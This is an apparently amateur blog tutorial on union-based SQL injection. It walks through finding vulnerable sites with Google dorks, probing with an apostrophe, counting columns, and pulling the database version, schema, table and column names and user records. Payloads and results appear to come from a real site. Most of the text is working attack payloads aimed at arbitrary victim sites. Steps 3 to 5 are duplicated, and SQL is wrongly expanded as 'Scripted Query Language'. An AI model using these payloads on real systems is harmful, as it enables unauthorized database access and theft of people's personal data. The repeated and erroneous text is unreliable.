Full SQL Injection Tutorial By JinX!
Hello everyone ,
This Is JinX! From Pakistan Cyber Pythons.
Today i am going to teach you "SQL INJECTION", Lets Begin....
First of all you need to know what does SQL means ?
So , SQL means "SCRIPTED QUERY LANGUAGE" and it help in making a database of a web-application.
Step 1: HOW TO CHECK THE VULNERABILITY:
We find vulnerable websites via GOOGLE DORKS. Google Dorks are simply a search operators which help us to find websites or you can say that google dorks help us to refine the search ..
SOME GOOGLE DORKS LISTED BELOW:
- inurl:index.php?id=
- inurl:cart.php?id=
- inurl:news_view.php?id=
- inurl:faq.php?id=
- inurl:products.php?id=
Now Suppose you get a website with one of the dorks above and thier address looks something like this
http://www.victimsite.com/index.php?id=10
what you need to do now is just put apostrophe ( ' ) in the end of the url like i do below.
http://www.victimsite.com/index.php?id=10'
If the page returns an SQL error, the page is vulnerable to SQLi. If it
loads normally, leave the page and move on to the next site in the
search result.
Typical errors you'll get after appending the apostrophe are:
Warning: mysql_fetch_array():
Warning: mysql_fetch_assoc():
Warning: mysql_numrows():
Warning: mysql_num_rows():
Warning: mysql_result():
Warning: mysql_preg_match():
Typical errors you'll get after appending the apostrophe are:
Warning: mysql_fetch_array():
Warning: mysql_fetch_assoc():
Warning: mysql_numrows():
Warning: mysql_num_rows():
Warning: mysql_result():
Warning: mysql_preg_match():
Step 2: ENUMERATE THE NUMBER OF COLUMNS:
Once you find a vulnerable site, you need to enumerate the
number of columns and those columns that are accepting the queries from
you.
Append an 'order by' statement to the URL.
EG. http://www.victimsite.com/index.php?id=10 order by 1
EG. http://www.victimsite.com/index.php?id=10 order by 1
Keep increasing the number until you get a SQL ERROR.So the highest number for which you do not get an error is the number of columns in the table.
Step 3 : Union Select QUERY TO GET which column to inject queries:
Append an 'Union Select' statement to the URL. Also precede the number after "id=" with a hyphen or minus.
Say from the above step, you got that the table has 6 columns.
eg. hxxp://www.abcd.com/index.php?catid=-1 union select 1,2,3,4,5,6
Result of this query will be the column numbers that are accepting the queries. Say we get 2,3,4 as the result. Now we'll inject our SQL statements in one of these columns.
Step 4: Enumerating the SQL version
We'll use the mysql command @@version or version() to get the version of the db. We have to inject the command in one of the open columns. Say we use column number 2.
eg. http://www.victimsite.com/index.php?id=-10 union select 1,@@version,3,4,5,6
You'll get the version of the database in the place where you had got the number 2. If the starting of the version number is 5 or more, then you are good to go. If less move on to another site.
Step 5: Expolit
To get list of databases:
http://www.victimsite.com/index.php?id=-10 union select 1,group_concat(schema_name),3,4,5,6 from information_schema.schemata--
Result will display a list of databases on the site. Here on, we'll write the results we have got from our test.
Result: information_schema,vrk_mlm
To know the current database in use:
http://www.victimsite.com/index.php?id=-10 union select 1,concat(database()),3,4,5,6--
Result: vrk_mlm
To get the current user:
http://www.victimsite.com/index.php?id=-10 union select 1,concat(user()),3,4,5,6--
Result: vrk_4mlm@localhost
To get the tables:
http://www.victimsite.com/index.php?id=-10 union select 1,group_concat(table_name),3,4,5,6 from information_schema.tables where table_schema=database()--
Result: administrator,category,product,users
We'll concentrate our attack on the users table.
To get the columns:
http://www.victimsite.com/index.php?id=-10 union select 1,group_concat(column_name),3,4,5,6 from information_schema.columns where table_schema=database()--
Result: admin_id,user_name,password,user_type,status,catID,catName,prodId,catID,prodName,prodDesc,
prodKeyword,prodPrice,prodImage,id,incredible_id,f_name,m_name,l_name,refered_by_id,
refered_direct_to_ids,refered_to_ids,no_of_direct_referals,credits,position,
email_id,password,edited_on,last_login,created_on,chain_number,phone,address
By lookin at the columns closely, and the order of the tables, we can conclude that starting from id,incredible_id are the columns belonging to the users table and we are interested in that.
Extract information:
union select group_concat(id,0x3a,incredible_id,0x3a,f_name,0x3a,m_name,0x3a,l_name,0x3a,refered_by_id,0
x3a,refered_direct_to_ids,0x3a) from vrk_mlm.users--
Say from the above step, you got that the table has 6 columns.
eg. hxxp://www.abcd.com/index.php?catid=-1 union select 1,2,3,4,5,6
Result of this query will be the column numbers that are accepting the queries. Say we get 2,3,4 as the result. Now we'll inject our SQL statements in one of these columns.
Step 4: Enumerating the SQL version
We'll use the mysql command @@version or version() to get the version of the db. We have to inject the command in one of the open columns. Say we use column number 2.
eg. http://www.victimsite.com/index.php?id=-10 union select 1,@@version,3,4,5,6
You'll get the version of the database in the place where you had got the number 2. If the starting of the version number is 5 or more, then you are good to go. If less move on to another site.
Step 5: Expolit
To get list of databases:
http://www.victimsite.com/index.php?id=-10 union select 1,group_concat(schema_name),3,4,5,6 from information_schema.schemata--
Result will display a list of databases on the site. Here on, we'll write the results we have got from our test.
Result: information_schema,vrk_mlm
To know the current database in use:
http://www.victimsite.com/index.php?id=-10 union select 1,concat(database()),3,4,5,6--
Result: vrk_mlm
To get the current user:
http://www.victimsite.com/index.php?id=-10 union select 1,concat(user()),3,4,5,6--
Result: vrk_4mlm@localhost
To get the tables:
http://www.victimsite.com/index.php?id=-10 union select 1,group_concat(table_name),3,4,5,6 from information_schema.tables where table_schema=database()--
Result: administrator,category,product,users
We'll concentrate our attack on the users table.
To get the columns:
http://www.victimsite.com/index.php?id=-10 union select 1,group_concat(column_name),3,4,5,6 from information_schema.columns where table_schema=database()--
Result: admin_id,user_name,password,user_type,status,catID,catName,prodId,catID,prodName,prodDesc,
prodKeyword,prodPrice,prodImage,id,incredible_id,f_name,m_name,l_name,refered_by_id,
refered_direct_to_ids,refered_to_ids,no_of_direct_referals,credits,position,
email_id,password,edited_on,last_login,created_on,chain_number,phone,address
By lookin at the columns closely, and the order of the tables, we can conclude that starting from id,incredible_id are the columns belonging to the users table and we are interested in that.
Extract information:
union select group_concat(id,0x3a,incredible_id,0x3a,f_name,0x3a,m_name,0x3a,l_name,0x3a,refered_by_id,0
x3a,refered_direct_to_ids,0x3a) from vrk_mlm.users--
It's All about SQL INJECTION Commnet Below OR Give Us Your Feedback , ON FACEBOOK
LIKES US ON FACEBOOK By Clicking Here
Special Thanks To : Mad Jack , Napster Dotnet , And Ofcourse Me For writing this article :D
Good Luck
NOTE:Only For Educational Purpose :)
If you guys have Any Query You can contact me @ My Facebook Page
ReplyDeleteOr By Email
it's jinx.stewart@yahoo.com